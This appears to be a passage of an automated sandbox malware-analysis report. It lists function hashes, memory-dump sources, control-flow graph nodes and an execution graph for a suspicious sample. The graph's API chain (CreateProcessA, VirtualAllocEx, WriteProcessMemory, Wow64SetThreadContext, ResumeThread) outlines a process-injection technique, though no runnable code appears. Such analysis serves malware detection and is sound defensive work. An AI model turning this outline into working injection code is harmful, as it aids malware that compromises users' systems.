                        • API String ID:
                        • Opcode ID: 061a4a14cc9ab71b6e8acd75a011ccc17d610c6344a8f4f0aff4ef25d397e7f1
                        • Instruction ID: 35b7c77b762fa97e0f86308c92cc2b6eabb28cc7b91e2498324a3ed3dd56f103
                        • Opcode Fuzzy Hash: 061a4a14cc9ab71b6e8acd75a011ccc17d610c6344a8f4f0aff4ef25d397e7f1
                        • Instruction Fuzzy Hash: 8AE13DB4E006598FDB14DFA9C5909AEFBF6FF89300F24816AE814AB355C7319941CFA0
                        Function 071E4910 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1f72c698f228396c1be9b15c4572153d94a5981fc67e00a34a5b8646417ec17d
                        • Instruction ID: 322a921bfbcce45f6b8aecd69ef85da6ac05f2bf1bcc314b5ee9319ba330b3a7
                        • Opcode Fuzzy Hash: 1f72c698f228396c1be9b15c4572153d94a5981fc67e00a34a5b8646417ec17d
                        • Instruction Fuzzy Hash: 3DE13CB4E106598FDB14DFA8C590AAEFBF6FF89301F24816AE814AB355C7319941CF60
                        Function 071E5180 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d2aa161c4b570af8fb55056119d6578898cd1d6394541b5a1b5d5a4dc47a9971
                        • Instruction ID: a2f94a41eae019a1478397786d2977ac4869db776219b02763476f0a0c3ef365
                        • Opcode Fuzzy Hash: d2aa161c4b570af8fb55056119d6578898cd1d6394541b5a1b5d5a4dc47a9971
                        • Instruction Fuzzy Hash: 5AE13DB4E006198FDB14DFA8C9909AEFBF6FF89305F24816AD814AB355D731A941CF60
                        Function 02E1DEEC Relevance: .3, Instructions: 264COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1601365371.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2e10000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3eae717ae088420f1afcbd376b41f7adac2013edea0334e3bdf7848808959c93
                        • Instruction ID: fc6f6e7afffcd1c64e4665e8cbde166c01fe05e5df15803aae0f7cf2b8b743af
                        • Opcode Fuzzy Hash: 3eae717ae088420f1afcbd376b41f7adac2013edea0334e3bdf7848808959c93
                        • Instruction Fuzzy Hash: 0AA17B32A102198FCF19DFA5C8445DEBBB2FF89304B15957AF806AB265DB31E905CF80
                        Function 071E6EE8 Relevance: .1, Instructions: 135COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a1f0657ba5b0fdc5bc21edaff6bd14f80f0e54dc4390f2fd77d343df00436e26
                        • Instruction ID: e03b6f55b7d6e40142514bac22fdea074a422e4eb88e0f5cd8753daf09fc64a8
                        • Opcode Fuzzy Hash: a1f0657ba5b0fdc5bc21edaff6bd14f80f0e54dc4390f2fd77d343df00436e26
                        • Instruction Fuzzy Hash: AC514BB0E102198FDB14DFA9C9909AEFBF6BF89304F24C16AD418AB355D7319941CFA1

                        Execution Graph

                        Execution Coverage:11.4%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:286
                        Total number of Limit Nodes:12
                        execution_graph 44935 4f082b0 44936 4f082dd 44935->44936 44949 4f07c70 44936->44949 44938 4f083b1 44939 4f07c70 CreateWindowExW 44938->44939 44940 4f083da 44939->44940 44941 4f07c70 CreateWindowExW 44940->44941 44942 4f08403 44941->44942 44943 4f07c70 CreateWindowExW 44942->44943 44944 4f0842c 44943->44944 44953 4f07c80 44944->44953 44947 4f07c80 CreateWindowExW 44948 4f0847e 44947->44948 44950 4f07c7b 44949->44950 44952 4f0c9c9 44950->44952 44957 4f07f6c 44950->44957 44952->44938 44954 4f07c8b 44953->44954 45030 4f08188 44954->45030 44956 4f08455 44956->44947 44958 4f07f77 44957->44958 44962 28f8638 44958->44962 44967 28f5d88 44958->44967 44959 4f0cabc 44959->44952 44964 28f863d 44962->44964 44963 28f8949 44963->44959 44964->44963 44972 28fcca0 44964->44972 44977 28fccb0 44964->44977 44969 28f5d93 44967->44969 44968 28f8949 44968->44959 44969->44968 44970 28fcca0 CreateWindowExW 44969->44970 44971 28fccb0 CreateWindowExW 44969->44971 44970->44968 44971->44968 44974 28fccb0 44972->44974 44973 28fccf5 44973->44963 44974->44973 44982 28fd268 44974->44982 44986 28fd258 44974->44986 44978 28fccd1 44977->44978 44979 28fccf5 44978->44979 44980 28fd258 CreateWindowExW 44978->44980 44981 28fd268 CreateWindowExW 44978->44981 44979->44963 44980->44979 44981->44979 44983 28fd275 44982->44983 44984 28fd2af 44983->44984 44990 28fd0a0 44983->44990 44984->44973 44987 28fd268 44986->44987 44988 28fd2af 44987->44988 44989 28fd0a0 CreateWindowExW 44987->44989 44988->44973 44989->44988 44991 28fd0ab 44990->44991 44993 28fdbc0 44991->44993 44994 28fd1bc 44991->44994 44995 28fd1c7 44994->44995 44996 28f5d88 CreateWindowExW 44995->44996 44997 28fdc2f 44996->44997 45001 28ff9c0 44997->45001 45007 28ff9a8 44997->45007 44998 28fdc69 44998->44993 45003 28ffaf1 45001->45003 45004 28ff9f1 45001->45004 45002 28ff9fd 45002->44998 45003->44998 45004->45002 45013 4f009c0 45004->45013 45018 4f009b2 45004->45018 45008 28ff9f1 45007->45008 45010 28ffaf1 45007->45010 45009 28ff9fd 45008->45009 45011 4f009c0 CreateWindowExW 45008->45011 45012 4f009b2 CreateWindowExW 45008->45012 45009->44998 45010->44998 45011->45010 45012->45010 45014 4f009eb 45013->45014 45015 4f00a9a 45014->45015 45024 4f01ca0 45014->45024 45027 4f01c70 45014->45027 45019 4f00993 45018->45019 45021 4f009ba 45018->45021 45019->45003 45020 4f00a9a 45020->45020 45021->45020 45022 4f01ca0 CreateWindowExW 45021->45022 45023 4f01c70 CreateWindowExW 45021->45023 45022->45020 45023->45020 45025 4f01130 CreateWindowExW 45024->45025 45026 4f01cd5 45025->45026 45026->45015 45028 4f01cd5 45027->45028 45029 4f01130 CreateWindowExW 45027->45029 45028->45015 45029->45028 45031 4f08193 45030->45031 45032 4f0d342 45031->45032 45033 28f8638 CreateWindowExW 45031->45033 45034 28f5d88 CreateWindowExW 45031->45034 45032->44956 45033->45032 45034->45032 45054 7157af7 45055 7157ad1 45054->45055 45056 7157c8c 45054->45056 45060 7158f61 45056->45060 45078 7158f68 45056->45078 45057 7157c9c 45061 7158f82 45060->45061 45073 7158f8a 45061->45073 45096 7159cf5 45061->45096 45100 715936a 45061->45100 45105 715952a 45061->45105 45110 715968b 45061->45110 45118 715982f 45061->45118 45123 71598a1 45061->45123 45127 7159941 45061->45127 45131 7159786 45061->45131 45136 7159385 45061->45136 45141 7159479 45061->45141 45146 71596be 45061->45146 45151 71597fc 45061->45151 45156 71595d3 45061->45156 45161 7159351 45061->45161 45166 7159634 45061->45166 45073->45057 45079 7158f82 45078->45079 45080 7159cf5 2 API calls 45079->45080 45081 7159634 2 API calls 45079->45081 45082 7159351 2 API calls 45079->45082 45083 71595d3 2 API calls 45079->45083 45084 71597fc 2 API calls 45079->45084 45085 71596be 2 API calls 45079->45085 45086 7159479 2 API calls 45079->45086 45087 7159385 2 API calls 45079->45087 45088 7159786 2 API calls 45079->45088 45089 7159941 2 API calls 45079->45089 45090 71598a1 2 API calls 45079->45090 45091 7158f8a 45079->45091 45092 715982f 2 API calls 45079->45092 45093 715968b 4 API calls 45079->45093 45094 715952a 2 API calls 45079->45094 45095 715936a 2 API calls 45079->45095 45080->45091 45081->45091 45082->45091 45083->45091 45084->45091 45085->45091 45086->45091 45087->45091 45088->45091 45089->45091 45090->45091 45091->45057 45092->45091 45093->45091 45094->45091 45095->45091 45171 7156e20 45096->45171 45175 7156e18 45096->45175 45097 7159d0f 45101 715935d 45100->45101 45102 71593c9 45101->45102 45179 7157678 45101->45179 45183 715766d 45101->45183 45102->45073 45106 7159530 45105->45106 45187 7156d70 45106->45187 45191 7156d68 45106->45191 45107 7159615 45107->45073 45203 7157330 45110->45203 45207 7157329 45110->45207 45111 7159634 45112 7159e4b 45111->45112 45195 71573f0 45111->45195 45199 71573e8 45111->45199 45112->45073 45113 715966c 45119 7159835 45118->45119 45211 71574e0 45119->45211 45215 71574d8 45119->45215 45120 7159858 45120->45073 45125 71573f0 WriteProcessMemory 45123->45125 45126 71573e8 WriteProcessMemory 45123->45126 45124 71598c5 45125->45124 45126->45124 45129 7156e20 Wow64SetThreadContext 45127->45129 45130 7156e18 Wow64SetThreadContext 45127->45130 45128 71594d8 45129->45128 45130->45128 45132 7159541 45131->45132 45133 7159615 45132->45133 45134 7156d70 ResumeThread 45132->45134 45135 7156d68 ResumeThread 45132->45135 45133->45073 45134->45133 45135->45133 45137 7159387 45136->45137 45138 71594ad 45137->45138 45139 715766d CreateProcessA 45137->45139 45140 7157678 CreateProcessA 45137->45140 45139->45138 45140->45138 45142 715947f 45141->45142 45144 715766d CreateProcessA 45142->45144 45145 7157678 CreateProcessA 45142->45145 45143 71594ad 45143->45143 45144->45143 45145->45143 45147 71596e1 45146->45147 45149 71573f0 WriteProcessMemory 45147->45149 45150 71573e8 WriteProcessMemory 45147->45150 45148 71599d7 45149->45148 45150->45148 45152 7159600 45151->45152 45153 7159615 45151->45153 45154 7156d70 ResumeThread 45152->45154 45155 7156d68 ResumeThread 45152->45155 45153->45073 45154->45153 45155->45153 45157 71595e8 45156->45157 45159 7156d70 ResumeThread 45157->45159 45160 7156d68 ResumeThread 45157->45160 45158 7159615 45158->45073 45159->45158 45160->45158 45162 715935d 45161->45162 45163 71594ad 45162->45163 45164 715766d CreateProcessA 45162->45164 45165 7157678 CreateProcessA 45162->45165 45164->45163 45165->45163 45167 715963a 45166->45167 45169 71573f0 WriteProcessMemory 45167->45169 45170 71573e8 WriteProcessMemory 45167->45170 45168 715966c 45169->45168 45170->45168 45172 7156e65 Wow64SetThreadContext 45171->45172 45174 7156ead 45172->45174 45174->45097 45176 7156e20 Wow64SetThreadContext 45175->45176 45178 7156ead 45176->45178 45178->45097 45180 7157701 CreateProcessA 45179->45180 45182 71578c3 45180->45182 45182->45182 45184 7157678 CreateProcessA 45183->45184 45186 71578c3 45184->45186 45188 7156db0 ResumeThread 45187->45188 45190 7156de1 45188->45190 45190->45107 45192 7156db0 ResumeThread 45191->45192 45194 7156de1 45192->45194 45194->45107 45196 7157438 WriteProcessMemory 45195->45196 45198 715748f 45196->45198 45198->45113 45200 71573f0 WriteProcessMemory 45199->45200 45202 715748f 45200->45202 45202->45113 45204 7157370 VirtualAllocEx 45203->45204 45206 71573ad 45204->45206 45206->45111 45208 7157330 VirtualAllocEx 45207->45208 45210 71573ad 45208->45210 45210->45111 45212 715752b ReadProcessMemory 45211->45212 45214 715756f 45212->45214 45214->45120 45216 71574e0 ReadProcessMemory 45215->45216 45218 715756f 45216->45218 45218->45120 45283 4f34380 45286 4f33378 45283->45286 45285 4f3438d 45287 4f33383 45286->45287 45291 28f5d58 45287->45291 45295 28f72f7 45287->45295 45288 4f34524 45288->45285 45292 28f5d63 45291->45292 45293 28f5d88 CreateWindowExW 45292->45293 45294 28f73ad 45293->45294 45294->45288 45296 28f7302 45295->45296 45297 28f5d88 CreateWindowExW 45296->45297 45298 28f73ad 45297->45298 45298->45288 45219 715a630 45220 715a7bb 45219->45220 45222 715a656 45219->45222 45222->45220 45223 715a134 45222->45223 45224 715a8b0 PostMessageW 45223->45224 45225 715a91c 45224->45225 45225->45222 45050 28fb2d8 45051 28fb31a 45050->45051 45052 28fb320 GetModuleHandleW 45050->45052 45051->45052 45053 28fb34d 45052->45053 45226 271d01c 45227 271d034 45226->45227 45228 271d08e 45227->45228 45232 4f02c08 45227->45232 45241 4f0115c 45227->45241 45250 4f01ea8 45227->45250 45235 4f02c45 45232->45235 45233 4f02c79 45270 4f01284 45233->45270 45235->45233 45236 4f02c69 45235->45236 45237 4f02c77 45236->45237 45254 4f02da0 45236->45254 45259 4f02d9f 45236->45259 45264 4f02e6c 45236->45264 45244 4f01167 45241->45244 45242 4f02c79 45243 4f01284 CallWindowProcW 45242->45243 45246 4f02c77 45243->45246 45244->45242 45245 4f02c69 45244->45245 45245->45246 45247 4f02da0 CallWindowProcW 45245->45247 45248 4f02e6c CallWindowProcW 45245->45248 45249 4f02d9f CallWindowProcW 45245->45249 45247->45246 45248->45246 45249->45246 45251 4f01ece 45250->45251 45252 4f0115c CallWindowProcW 45251->45252 45253 4f01eef 45252->45253 45253->45228 45256 4f02db4 45254->45256 45255 4f02e40 45255->45237 45274 4f02e57 45256->45274 45277 4f02e58 45256->45277 45261 4f02db4 45259->45261 45260 4f02e40 45260->45237 45262 4f02e57 CallWindowProcW 45261->45262 45263 4f02e58 CallWindowProcW 45261->45263 45262->45260 45263->45260 45265 4f02e2a 45264->45265 45266 4f02e7a 45264->45266 45268 4f02e57 CallWindowProcW 45265->45268 45269 4f02e58 CallWindowProcW 45265->45269 45267 4f02e40 45267->45237 45268->45267 45269->45267 45271 4f0128f 45270->45271 45272 4f0435a CallWindowProcW 45271->45272 45273 4f04309 45271->45273 45272->45273 45273->45237 45275 4f02e69 45274->45275 45280 4f0429e 45274->45280 45275->45255 45278 4f02e69 45277->45278 45279 4f0429e CallWindowProcW 45277->45279 45278->45255 45279->45278 45281 4f01284 CallWindowProcW 45280->45281 45282 4f042aa 45281->45282 45282->45275 45035 28fd380 45036 28fd3c6 45035->45036 45040 28fd550 45036->45040 45044 28fd560 45036->45044 45037 28fd4b3 45041 28fd560 45040->45041 45047 28fafd4 45041->45047 45045 28fafd4 DuplicateHandle 45044->45045 45046 28fd58e 45045->45046 45046->45037 45048 28fd5c8 DuplicateHandle 45047->45048 45049 28fd58e 45048->45049 45049->45037

                        Executed Functions

                        Function 04F38ADC Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1806 4f38adc-4f39b21 1831 4f39b24 call 4f3a537 1806->1831 1832 4f39b24 call 4f3a548 1806->1832 1813 4f39b2a-4f39b43 1817 4f39ba5-4f39c3d call 4f38b0c 1813->1817 1818 4f39b45-4f39b9d 1813->1818 1833 4f39c40 call 4f3ac5b 1817->1833 1834 4f39c40 call 4f3ac68 1817->1834 1818->1817 1823 4f39c43-4f39c8a call 4f37380 call 4f38b1c 1831->1813 1832->1813 1833->1823 1834->1823
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID: $
                        • API String ID: 0-227171996
                        • Opcode ID: 4990afce1efafe64da4aef9abe3b156837343f15feffd79e1af69c1976d3abb0
                        • Instruction ID: b1b2f67d0f39c8ed8d2135831334efa7cfd8fec7d80f05e735e324a1cdb87656
                        • Opcode Fuzzy Hash: 4990afce1efafe64da4aef9abe3b156837343f15feffd79e1af69c1976d3abb0
                        • Instruction Fuzzy Hash: 3271A075910701CFEB10EF29D484A55B7B1FFC6315B4086A8D949AF21AEB79F889CF80
                        Function 04F39A11 Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1835 4f39a11-4f39b09 1840 4f39b15-4f39b21 1835->1840 1859 4f39b24 call 4f3a537 1840->1859 1860 4f39b24 call 4f3a548 1840->1860 1841 4f39b2a-4f39b43 1845 4f39ba5-4f39c24 call 4f38b0c 1841->1845 1846 4f39b45-4f39b9d 1841->1846 1850 4f39c2a-4f39c3d 1845->1850 1846->1845 1861 4f39c40 call 4f3ac5b 1850->1861 1862 4f39c40 call 4f3ac68 1850->1862 1851 4f39c43-4f39c8a call 4f37380 call 4f38b1c 1859->1841 1860->1841 1861->1851 1862->1851
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID: $
                        • API String ID: 0-227171996
                        • Opcode ID: 663718673c8408d3f833cee51b911f663b879109316756a5b16b86948bf4576a
                        • Instruction ID: ac1496c19be1cd4b456619cafeb3debc1857c2399356b1af03445b8314a6db74
                        • Opcode Fuzzy Hash: 663718673c8408d3f833cee51b911f663b879109316756a5b16b86948bf4576a
                        • Instruction Fuzzy Hash: DC71B175910701CFEB10EF29D884A55B7B1FF86315B4086A8D949AF31AEB79F885CF80
                        Function 0715766D Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1863 715766d-715770d 1866 7157746-7157766 1863->1866 1867 715770f-7157719 1863->1867 1872 715779f-71577ce 1866->1872 1873 7157768-7157772 1866->1873 1867->1866 1868 715771b-715771d 1867->1868 1870 7157740-7157743 1868->1870 1871 715771f-7157729 1868->1871 1870->1866 1874 715772d-715773c 1871->1874 1875 715772b 1871->1875 1883 7157807-71578c1 CreateProcessA 1872->1883 1884 71577d0-71577da 1872->1884 1873->1872 1876 7157774-7157776 1873->1876 1874->1874 1877 715773e 1874->1877 1875->1874 1878 7157799-715779c 1876->1878 1879 7157778-7157782 1876->1879 1877->1870 1878->1872 1881 7157784 1879->1881 1882 7157786-7157795 1879->1882 1881->1882 1882->1882 1885 7157797 1882->1885 1895 71578c3-71578c9 1883->1895 1896 71578ca-7157950 1883->1896 1884->1883 1886 71577dc-71577de 1884->1886 1885->1878 1888 7157801-7157804 1886->1888 1889 71577e0-71577ea 1886->1889 1888->1883 1890 71577ec 1889->1890 1891 71577ee-71577fd 1889->1891 1890->1891 1891->1891 1892 71577ff 1891->1892 1892->1888 1895->1896 1906 7157960-7157964 1896->1906 1907 7157952-7157956 1896->1907 1908 7157974-7157978 1906->1908 1909 7157966-715796a 1906->1909 1907->1906 1910 7157958 1907->1910 1912 7157988-715798c 1908->1912 1913 715797a-715797e 1908->1913 1909->1908 1911 715796c 1909->1911 1910->1906 1911->1908 1915 715799e-71579a5 1912->1915 1916 715798e-7157994 1912->1916 1913->1912 1914 7157980 1913->1914 1914->1912 1917 71579a7-71579b6 1915->1917 1918 71579bc 1915->1918 1916->1915 1917->1918 1919 71579bd 1918->1919 1919->1919
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071578AE
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: f787b9aca8fd68840daa8e024e5f42d51a2dd2b10e6944c56e627b2ef34a9209
                        • Instruction ID: 0dea056dba4d940c95ede8be3b84a29ac670eb4c596e8c26397046efad303c29
                        • Opcode Fuzzy Hash: f787b9aca8fd68840daa8e024e5f42d51a2dd2b10e6944c56e627b2ef34a9209
                        • Instruction Fuzzy Hash: 0BA14BB1D00219DFEB25CF68C845BEEBBB2BF49310F1485A9DC58A7280DB749985CF91
                        Function 07157678 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1921 7157678-715770d 1923 7157746-7157766 1921->1923 1924 715770f-7157719 1921->1924 1929 715779f-71577ce 1923->1929 1930 7157768-7157772 1923->1930 1924->1923 1925 715771b-715771d 1924->1925 1927 7157740-7157743 1925->1927 1928 715771f-7157729 1925->1928 1927->1923 1931 715772d-715773c 1928->1931 1932 715772b 1928->1932 1940 7157807-71578c1 CreateProcessA 1929->1940 1941 71577d0-71577da 1929->1941 1930->1929 1933 7157774-7157776 1930->1933 1931->1931 1934 715773e 1931->1934 1932->1931 1935 7157799-715779c 1933->1935 1936 7157778-7157782 1933->1936 1934->1927 1935->1929 1938 7157784 1936->1938 1939 7157786-7157795 1936->1939 1938->1939 1939->1939 1942 7157797 1939->1942 1952 71578c3-71578c9 1940->1952 1953 71578ca-7157950 1940->1953 1941->1940 1943 71577dc-71577de 1941->1943 1942->1935 1945 7157801-7157804 1943->1945 1946 71577e0-71577ea 1943->1946 1945->1940 1947 71577ec 1946->1947 1948 71577ee-71577fd 1946->1948 1947->1948 1948->1948 1949 71577ff 1948->1949 1949->1945 1952->1953 1963 7157960-7157964 1953->1963 1964 7157952-7157956 1953->1964 1965 7157974-7157978 1963->1965 1966 7157966-715796a 1963->1966 1964->1963 1967 7157958 1964->1967 1969 7157988-715798c 1965->1969 1970 715797a-715797e 1965->1970 1966->1965 1968 715796c 1966->1968 1967->1963 1968->1965 1972 715799e-71579a5 1969->1972 1973 715798e-7157994 1969->1973 1970->1969 1971 7157980 1970->1971 1971->1969 1974 71579a7-71579b6 1972->1974 1975 71579bc 1972->1975 1973->1972 1974->1975 1976 71579bd 1975->1976 1976->1976
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071578AE
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1681994046.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7150000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: a2670f1d1068e8c1ef5a102295f1464284d96484330ff8a6e3bb7271ed96665f
                        • Instruction ID: ee8e553d0aa0f275414f0720d84b5872f4e4a9a989ebaa234372fc8b68d49604
                        • Opcode Fuzzy Hash: a2670f1d1068e8c1ef5a102295f1464284d96484330ff8a6e3bb7271ed96665f
                        • Instruction Fuzzy Hash: F0914AB1D00219DFEB15CF68C846BEEBBB2BF48310F1585A9DC18A7280DB749985CF91
                        Function 028FAFC8 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1978 28fafc8-28fafd5 1980 28fb00e-28fb010 1978->1980 1981 28fafd7-28fafdb 1978->1981 1984 28fb047-28fb04e 1980->1984 1985 28fb012-28fb03f 1980->1985 1982 28fd5c8-28fd65c DuplicateHandle 1981->1982 1986 28fd65e-28fd664 1982->1986 1987 28fd665-28fd682 1982->1987 1988 28fb05d-28fb065 1984->1988 1989 28fb050-28fb05b 1984->1989 1985->1984 1986->1987 1990 28fb068-28fb071 1988->1990 1989->1990 1994 28fb0b7-28fb0c2 1990->1994 1995 28fb073-28fb077 1990->1995 1996 28fb0cf-28fb0d4 1994->1996 1998 28fb0ae-28fb0b5 1995->1998 1999 28fb079-28fb0a6 1995->1999 1998->1994 2000 28fb0c4-28fb0cc 1998->2000 1999->1998 2000->1996
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,028FD58E,?,?,?,?,?), ref: 028FD64F
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1676258069.00000000028F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_28f0000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: de368fc9d19ab8d5337608d9a60b622d7c02055e2cf4b6f64829f60c067b1a6a
                        • Instruction ID: d033ef24314c63b744ec38a8d099cf124d5cad9d60bdfa8b06fe09c9bb771f88
                        • Opcode Fuzzy Hash: de368fc9d19ab8d5337608d9a60b622d7c02055e2cf4b6f64829f60c067b1a6a
                        • Instruction Fuzzy Hash: 3B417974900348EFEB11CF69C444B9ABBF1FB48318F108859E258EB691C3B6E945CFA5
                        Function 04F01130 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2003 4f01130-4f01d56 2005 4f01d61-4f01d68 2003->2005 2006 4f01d58-4f01d5e 2003->2006 2007 4f01d73-4f01e12 CreateWindowExW 2005->2007 2008 4f01d6a-4f01d70 2005->2008 2006->2005 2010 4f01e14-4f01e1a 2007->2010 2011 4f01e1b-4f01e53 2007->2011 2008->2007 2010->2011 2015 4f01e60 2011->2015 2016 4f01e55-4f01e58 2011->2016 2017 4f01e61 2015->2017 2016->2015 2017->2017
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F01E02
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680747905.0000000004F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f00000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: e3c0b9f4abf845126c69afea03bd48a61f3d0995ba01ce67b7b8aaa0b435e0b9
                        • Instruction ID: 21317e0bd917f8a2f732a3cb4527ebabfed415c154c92d60746bd5dea49ea114
                        • Opcode Fuzzy Hash: e3c0b9f4abf845126c69afea03bd48a61f3d0995ba01ce67b7b8aaa0b435e0b9
                        • Instruction Fuzzy Hash: B951CFB1D00349DFDF14CF99C984ADEBBB5BF88310F24812AE818AB250D775A845DF90
                        Function 028F590C Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2018 28f590c-28f598c 2020 28f598f-28f59d2 CreateActCtxA 2018->2020 2022 28f59d9 2020->2022 2023 28f59db-28f59e1 2022->2023 2024 28f59e2-28f5a3c 2022->2024 2023->2024 2031 28f5a3e-28f5a41 2024->2031 2032 28f5a4b-28f5a4f 2024->2032 2031->2032 2033 28f5a51-28f5a5d 2032->2033 2034 28f5a60-28f5a90 2032->2034 2033->2034 2038 28f5a42-28f5a47 2034->2038 2039 28f5a92-28f5b14 2034->2039 2038->2032
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 028F59C9
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1676258069.00000000028F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_28f0000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 53f879af86a36da9590ed6ca3b77b7ab5875485d58dcb8830319145327e55d1a
                        • Instruction ID: fb4d35a0429a3a02c348cf365c74a84652658691972a1a6bf3162a42927d9ab7
                        • Opcode Fuzzy Hash: 53f879af86a36da9590ed6ca3b77b7ab5875485d58dcb8830319145327e55d1a
                        • Instruction Fuzzy Hash: F641E074C00719CFEB24DFA9C884BDEBBB5BF48704F20806AD508AB251DB756949CF50
                        Function 04F01284 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2042 4f01284-4f042fc 2045 4f04302-4f04307 2042->2045 2046 4f043ac-4f043cc call 4f0115c 2042->2046 2047 4f04309-4f04340 2045->2047 2048 4f0435a-4f04392 CallWindowProcW 2045->2048 2053 4f043cf-4f043dc 2046->2053 2055 4f04342-4f04348 2047->2055 2056 4f04349-4f04358 2047->2056 2051 4f04394-4f0439a 2048->2051 2052 4f0439b-4f043aa 2048->2052 2051->2052 2052->2053 2055->2056 2056->2053
                        APIs
                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 04F04381
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680747905.0000000004F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f00000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID: CallProcWindow
                        • String ID:
                        • API String ID: 2714655100-0
                        • Opcode ID: aeb7efeb45e85bae3eb63a2098a6d291fafb62cc5c60e57934bea1340082ea97
                        • Instruction ID: 9d48759fff8833eb0dc4c0a7759cda92335e78f956610cdf58dd5c58e3a24471
                        • Opcode Fuzzy Hash: aeb7efeb45e85bae3eb63a2098a6d291fafb62cc5c60e57934bea1340082ea97
